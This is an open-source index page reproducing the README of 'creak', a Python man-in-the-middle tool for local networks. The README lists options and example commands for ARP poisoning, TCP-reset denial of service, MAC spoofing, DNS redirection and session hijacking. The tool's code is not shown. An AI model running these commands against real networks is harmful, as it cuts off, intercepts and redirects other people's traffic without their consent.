Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/codepr/creak
Poison, reset, spoof, redirect MITM script
https://github.com/codepr/creak
fake poison python python-3 spoof tool
Last synced: 23 days ago
JSON representation
Poison, reset, spoof, redirect MITM script
- Host: GitHub
- URL: https://github.com/codepr/creak
- Owner: codepr
- License: gpl-3.0
- Created: 2015-09-24T16:23:50.000Z (about 9 years ago)
- Default Branch: master
- Last Pushed: 2023-08-05T11:18:42.000Z (over 1 year ago)
- Last Synced: 2024-08-04T09:06:25.893Z (4 months ago)
- Topics: fake, poison, python, python-3, spoof, tool
- Language: Python
- Homepage:
- Size: 118 KB
- Stars: 125
- Watchers: 14
- Forks: 36
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- Changelog: CHANGELOG.md
- License: LICENSE
Awesome Lists containing this project
- awesome-hacking-lists - codepr/creak - Poison, reset, spoof, redirect MITM script (Python)
- awesome-network-stuff - **112**星
README
# creak
Performs some of the most famous MITM attack on target addresses located in a
local network. Among these, deny navigation and download capabilities of a
target host in the local network performing an ARP poison attack and sending
reset TCP packets to every request made to the router.
Born as a didactic project for learning python language, I decline every
responsibility for any abuse, including malevolent or illegal use of this code.## Installation
```sh
$ git clone https://github.com/codepr/creak.git
$ cd creak
$ python setup.py install
```
or simply clone the repository and run the `creak.py` after all requirements are
installed:```sh
$ git clone https://github.com/codepr/creak.git
```It is required to have installed `pcap` libraries for raw packet manipulations
and `dpkt` module, for dns spoofing options is required to have installed dnet
module from `libdnet` package, do not confuse it with pydnet (network
evaluation tool) module.
It can use also `scapy` if desired, can just be set in the `config` file at the
section `[output]` > `ENGINE`.## Options
```sh
Usage: creak.py [options] devOptions:
-h, --help show this help message and exit
-1, --sessions-scan Sessions scan mode
-2, --dns-spoof Dns spoofing
-3, --session-hijack Try to steal a TCP sessions by desynchronization (old technique)
-x, --spoof Spoof mode, generate a fake MAC address to be used
during attack
-m MACADDR Mac address octet prefix (could be an entire MAC
address in the form AA:BB:CC:DD:EE:FF)
-M MANUFACTURER Manufacturer of the wireless device, for retrieving a
manufactur based prefix for MAC spoof
-s SOURCE Source ip address (e.g. a class C address like
192.168.1.150) usually the router address
-t TARGET Target ip address (e.g. a class C address like
192.168.1.150), can be specified multiple times
-p PORT Target port to shutdown
-a HOST Target host that will be redirect while navigating on
target machine
-r REDIR Target redirection that will be fetched instead of host
on the target machine
-v, --verbose Verbose output mode
-d, --dotted Dotted output mode
```## Example
Most basic usage:
Deny all traffic to the target host```sh
$ python creak.py -t 192.168.1.30 wlan0
```Set a different gateway:
```sh
$ python creak.py -s 192.168.1.2 -t 192.168.1.30 wlan0
```Set a different mac address for the device:
```sh
$ python creak.py -m 00:11:22:33:44:55 -t 192.168.1.30 wlan0
```Spoof mac address generating a fake one:
```sh
$ python creak.py -x -t 192.168.1.30 wlan0
```Spoof mac address generating one based on manufacturer(e.g Xeros):
```sh
$ python creak.py -x -M xeros -t 192.168.1.30 wlan0
```DNS spoofing using a fake MAC address, redirecting ab.xy to cd.xz(e.g.
localhost):```sh
$ python creak.py -x -M xeros -t 192.168.1.30 -a www.ab.xy -r www.cd.xz wlan0
```Deny multiple hosts in the subnet:
```sh
$ python creak.py -x -t 192.168.1.30 -t 192.168.1.31 -t 192.168.1.32 wlan0
```## Changelog
See the [CHANGELOG](CHANGELOG.md) file.
## TODO
- Sessions grouping based on active load usage
- Complete `Scapy` support (**started**)
- Sessions hijacking (**started**)
- Port to a micro-framework wih plugin architecture (**75% completed**)## License
See the [LICENSE](LICENSE.md) file for license rights and limitations (GNU v3).